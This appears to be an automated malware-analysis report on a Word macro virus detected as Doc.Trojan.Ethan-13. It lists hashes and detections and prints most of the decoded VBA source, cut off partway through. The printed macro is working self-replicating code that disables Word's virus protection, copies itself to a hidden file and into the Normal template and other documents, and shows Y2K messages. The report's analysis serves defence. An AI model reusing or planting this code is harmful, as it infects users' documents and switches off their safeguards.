Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 10840cf1072d3436…

MALICIOUS

Office (OLE)

54.0 KB Created: 2003-10-01 00:11:00 Authoring application: Microsoft Word 8.0 First seen: 2019-03-18
MD5: 28247147176b6088962ddece2bae947b SHA-1: 84c90825646a6d417b250836eb13c6637d8595fd SHA-256: 10840cf1072d34366128f42ddfaf9687f9b67e1c794c923ee85cb7c90d0f2caa
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Ethan-13. Static analysis revealed the presence of VBA macros. The macro code attempts to disable macro security warnings and copy its content to the Normal template, suggesting an attempt at persistence or propagation. The macro also creates a backup file 'c:\sys00.bak', which could be part of its operational mechanism.

Heuristics 2

  • ClamAV: Doc.Trojan.Ethan-13 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ethan-13
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19117 bytes
SHA-256: f823ceb47773c813b49795eba88a4ddc851e68e3517e86700bfd5d8ebc28e776
Detection
ClamAV: Doc.Trojan.Ethan-13
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
'y2k
' Open Letter to the Virus Hunters
'
' This virus was written to help educate the
' public about the dangers of the approaching
' millennium bug. Please do not update your
' virus scanners to detect or clean this virus
' until after December 1, 1999.
'
' I know you won't do that, but what the heck.
'
' I tried.
'
' Bye!
'
On Error Resume Next

s = ActiveDocument.Saved

Application.EnableCancelKey = Not -1

With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With

Randomize

If Dir("c:\sys00.bak", 6) = "" Then
   Open "c:\sys00.bak" For Output As #1
   For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
      a = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
      Print #1, a
      Next i
   Close #1
   SetAttr "c:\sys00.bak", 6
End If

If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'y2k" Then
   Set tf = NormalTemplate.VBProject.VBComponents.Item(1)
ElseIf ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'y2k" Then
   Set tf = ActiveDocument.VBProject.VBComponents.Item(1)
Else
   tf = ""
End If

If tf <> "" Then
   Open "c:\sys00.bak" For Input As #1
   If LOF(1) = 0 Then GoTo q
   i = 1
   Do While Not EOF(1)
      Line Input #1, a
      tf.CodeModule.InsertLines i, a
      i = i + 1
   Loop
q:
   Close #1
   ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
   If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s
End If

dd = Day(Now): mm = Month(Now): yy = Year(Now)
hh = Hour(Now): mm = Minute(Now): ss = Second(Now)

' only display messages for 1999
If yy <> 1999 Then
   GoTo end_here
End If

' only display messages until after lunch
If hh > 12 Then
   GoTo end_here
End If

t$ = Chr(13) + Chr(13)

'april 1, 1999
If dd = 1 And mm = 4 Then
   Title$ = "Y2K! Spread the word"
   msg$ = "This is not an April fools joke. I wish it were! The year 2000 is fast approaching, and the word still needs to be spread about the implications and dangers of the millennium bug commonly referred to as the Y2K bug. The virus that has infected this word document was written to help spread the word about the Y2K bug, and educate you so you can prepare yourself and your family for Saturday January 1, 2000."
   msg$ = msg$ + t$ + "From today until January 1, 2000, on the first business day of each month, I will give you a lesson in Y2K preparation."
   msg$ = msg$ + t$ + "Spread the word. Knowledge is power!"
   MsgBox msg$, vbCritical, Title$
End If
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
If dd = 2 And mm = 7 Then
   Title$ = "Did you get the stove?"
   msg$ = "Last month I recommend purchasing a gas stove to help heat your home in the event that your supply of electricity, gas, or oil was interrupted. This month I would like to suggest that you purchase a portable generator and enough gas cans to store gas to power the generator. The generator can be used to power lighting and small electrical appliances should the power be disrupted."
   msg$ = msg$ + t$ + "That's it for this month. See you next month!"
   MsgBox msg$, vbCritical, Title$
End If

'August 2, 1999
If dd = 2 And mm = 8 Then
   Title$ = "Getting back to basics"
   msg$ = "In this installment, I would like to suggest that you consider purchasing candles, matches, flashlights, and batteries. These items will be invaluable during those cold, dark nights should the power companies fail in their Y2K conversion. Don't plan on relying on the banks or credit/debit cards. Start each month, and stash away enough money to last you at least 2 months. This money should include enough money to pay the rent/mortgage, utilities, FOOD, etc. Remember cold hard cash
... (truncated)